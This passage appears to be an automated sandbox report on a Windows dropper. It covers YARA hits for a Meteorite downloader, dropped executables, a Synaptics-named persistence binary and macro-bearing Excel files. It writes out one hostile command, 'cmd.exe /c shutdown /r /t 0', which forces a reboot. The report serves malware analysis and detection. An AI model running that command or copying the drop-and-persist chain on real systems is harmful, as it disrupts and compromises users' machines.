                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D462A89_2_00D462A8
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D382539_2_00D38253
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D313FD9_2_00D313FD
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D464D79_2_00D464D7
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D3742E9_2_00D3742E
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D355B09_2_00D355B0
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D4E6009_2_00D4E600
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D307A79_2_00D307A7
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D388AF9_2_00D388AF
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D2D8339_2_00D2D833
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D2395A9_2_00D2395A
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D24A8E9_2_00D24A8E
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D4EAAE9_2_00D4EAAE
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D52BB49_2_00D52BB4
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D2FCCC9_2_00D2FCCC
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D22EB69_2_00D22EB6
                      Source: C:\Windows\wic.exeCode function: 11_2_00EAE75811_2_00EAE758
                      Source: C:\Windows\wic.exeCode function: 11_2_00FEE92411_2_00FEE924
                      Source: C:\Windows\wic.exeCode function: 11_2_00FCEDB411_2_00FCEDB4
                      Source: C:\Windows\wic.exeCode function: 11_2_00F0F06E11_2_00F0F06E
                      Source: C:\Windows\wic.exeCode function: 11_2_00EB585111_2_00EB5851
                      Source: C:\Windows\wic.exeCode function: 11_2_00EBB90511_2_00EBB905
                      Source: C:\Windows\wic.exeCode function: 11_2_00EB3BD011_2_00EB3BD0
                      Source: C:\Windows\wic.exeCode function: 11_2_00EE5EC811_2_00EE5EC8
                      Source: C:\Windows\wic.exeCode function: 11_2_00ED1E3F11_2_00ED1E3F
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BAC0B018_2_00BAC0B0
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB600118_2_00BB6001
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BBA1A318_2_00BBA1A3
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB62BC18_2_00BB62BC
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BCF3E418_2_00BCF3E4
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BAC35518_2_00BAC355
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BBA40418_2_00BBA404
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC759218_2_00BC7592
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BCF51118_2_00BCF511
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB664218_2_00BB6642
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BBD7A018_2_00BBD7A0
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB571E18_2_00BB571E
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BA288018_2_00BA2880
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB284A18_2_00BB284A
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB5A9018_2_00BB5A90
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BC7CA918_2_00BC7CA9
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BA3DA018_2_00BA3DA0
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB5D3A18_2_00BB5D3A
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB9F7B18_2_00BB9F7B
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BCCF6D18_2_00BCCF6D
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                      Source: SiyGYB3T.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                      Source: HTAGVDFUIE.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                      Source: C:\Windows\cbas.exeCode function: String function: 00BB4180 appears 51 times
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: String function: 00DF8246 appears 70 times
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: String function: 00DC1525 appears 37 times
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: String function: 00DF8213 appears 32 times
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: String function: 00DE3330 appears 37 times
                      Source: C:\Windows\wic.exeCode function: String function: 00FCBA7E appears 113 times
                      Source: C:\Windows\wic.exeCode function: String function: 00EA6486 appears 44 times
                      Source: C:\Windows\wic.exeCode function: String function: 00E82320 appears 31 times
                      Source: C:\Windows\wic.exeCode function: String function: 00FCB512 appears 49 times
                      Source: C:\Windows\wic.exeCode function: String function: 00FCBB30 appears 35 times
                      Source: C:\Windows\wic.exeCode function: String function: 00FCBA4A appears 265 times
                      Source: C:\Program Files (x86)\4.exeCode function: String function: 00D3FFD0 appears 56 times
                      Source: C:\Program Files (x86)\4.exeCode function: String function: 00D407A0 appears 31 times
                      Source: C:\Program Files (x86)\4.exeCode function: String function: 00D3FEFC appears 42 times
                      Source: file.exeStatic PE information: Resource name: RT_VERSION type: Intel ia64 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                      Source: 1[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                      Source: 1[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: 1.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                      Source: 1.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: 2[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: 2[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: 2.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: 2.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: ._cache_1.exe.1.drStatic PE information: Resource name: RT_DIALOG type: COM executable for DOS
                      Source: Synaptics.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                      Source: Synaptics.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: RCXF181.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: HjsFu2ta.exe.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: RCXF308.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                      Source: RCXF308.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: RCXF376.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                      Source: RCXF376.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Source: msslac[1].dll.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: msslac.dll.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: file.exe, 00000000.00000003.1708747349.0000000000760000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                      Source: file.exe, 00000000.00000002.1801134772.0000000000407000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDVarFileInfo$ vs file.exe
                      Source: file.exe, 00000000.00000000.1682697536.0000000000407000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDVarFileInfo$ vs file.exe
                      Source: file.exe, 00000000.00000003.1708777064.0000000000751000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                      Source: file.exe, 00000000.00000003.1708870405.000000000075C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                      Source: file.exe, 00000000.00000003.1708813251.0000000000705000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                      Source: file.exe, 00000000.00000003.1747294140.0000000000780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                      Source: file.exeBinary or memory string: OriginalFilenameDVarFileInfo$ vs file.exe
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: file.exe, type: SAMPLEMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: 3.3.Synaptics.exe.20c4000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: 3.3.Synaptics.exe.20c4000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: 3.3.Synaptics.exe.755cc8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: 00000003.00000003.1718137982.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, type: DROPPEDMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, type: DROPPEDMatched rule: MALWARE_Win_Meteorite author = ditekSHen, description = Detects Meteorite downloader
                      Source: classification engineClassification label: mal88.rans.troj.expl.evad.winEXE@26/36@5/4
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DCA149 GetLastError,FormatMessageW,LocalFree,8_2_00DCA149
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BA23E0 Sleep,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,OpenProcess,K32EnumProcessModules,K32GetModuleFileNameExA,CloseHandle,Process32Next,CloseHandle,18_2_00BA23E0
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDB49D CLSIDFromString,CoCreateInstance,8_2_00DDB49D
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DDCB0A FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GlobalUnlock,GlobalFree,8_2_00DDCB0A
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\1.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
                      Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exeJump to behavior
                      Source: Yara matchFile source: 0.3.file.exe.764011.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.1747294140.0000000000780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF376.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\1.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RCXF308.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXF181.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exe, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\2.exe, type: DROPPED
                      Source: C:\Users\user\Desktop\._cache_2.exeCommand line argument: sfxname8_2_00DDE674
                      Source: C:\Users\user\Desktop\._cache_2.exeCommand line argument: sfxstime8_2_00DDE674
                      Source: C:\Users\user\Desktop\._cache_2.exeCommand line argument: STARTDLG8_2_00DDE674
                      Source: C:\Program Files (x86)\4.exeCommand line argument: sfxname9_2_00D3F05C
                      Source: C:\Program Files (x86)\4.exeCommand line argument: sfxstime9_2_00D3F05C
                      Source: C:\Program Files (x86)\4.exeCommand line argument: STARTDLG9_2_00D3F05C
                      Source: C:\Windows\cbas.exeCommand line argument: temp.txt18_2_00BA6B80
                      Source: C:\Program Files (x86)\1.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: file.exeReversingLabs: Detection: 86%
                      Source: ._cache_1.exeString found in binary or memory: -h --help give this help
                      Source: ._cache_1.exeString found in binary or memory: -h --help give this help
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\1.exe "C:\Program Files (x86)\1.exe" 0
                      Source: C:\Program Files (x86)\1.exeProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe" 0
                      Source: C:\Program Files (x86)\1.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\2.exe "C:\Program Files (x86)\2.exe" 0
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\3.exe "C:\Program Files (x86)\3.exe" 0
                      Source: C:\Program Files (x86)\2.exeProcess created: C:\Users\user\Desktop\._cache_2.exe "C:\Users\user\Desktop\._cache_2.exe" 0
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\4.exe "C:\Program Files (x86)\4.exe" 0
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\wic.exe "C:\Windows\wic.exe" 0
                      Source: C:\Windows\wic.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "shutdown /r /t 0"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0
                      Source: unknownProcess created: C:\Windows\cbas.exe "C:\Windows\cbas.exe"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\1.exe "C:\Program Files (x86)\1.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\2.exe "C:\Program Files (x86)\2.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\3.exe "C:\Program Files (x86)\3.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files (x86)\4.exe "C:\Program Files (x86)\4.exe" 0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\wic.exe "C:\Windows\wic.exe" 0Jump to behavior
                      Source: C:\Program Files (x86)\1.exeProcess created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe" 0Jump to behavior
                      Source: C:\Program Files (x86)\1.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                      Source: C:\Program Files (x86)\2.exeProcess created: C:\Users\user\Desktop\._cache_2.exe "C:\Users\user\Desktop\._cache_2.exe" 0Jump to behavior
                      Source: C:\Windows\wic.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "shutdown /r /t 0"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: version.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: twext.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: shacct.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: idstore.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: starttiledata.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: acppage.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: wlidprov.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: provsvc.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: twext.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: starttiledata.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: acppage.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files (x86)\1.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
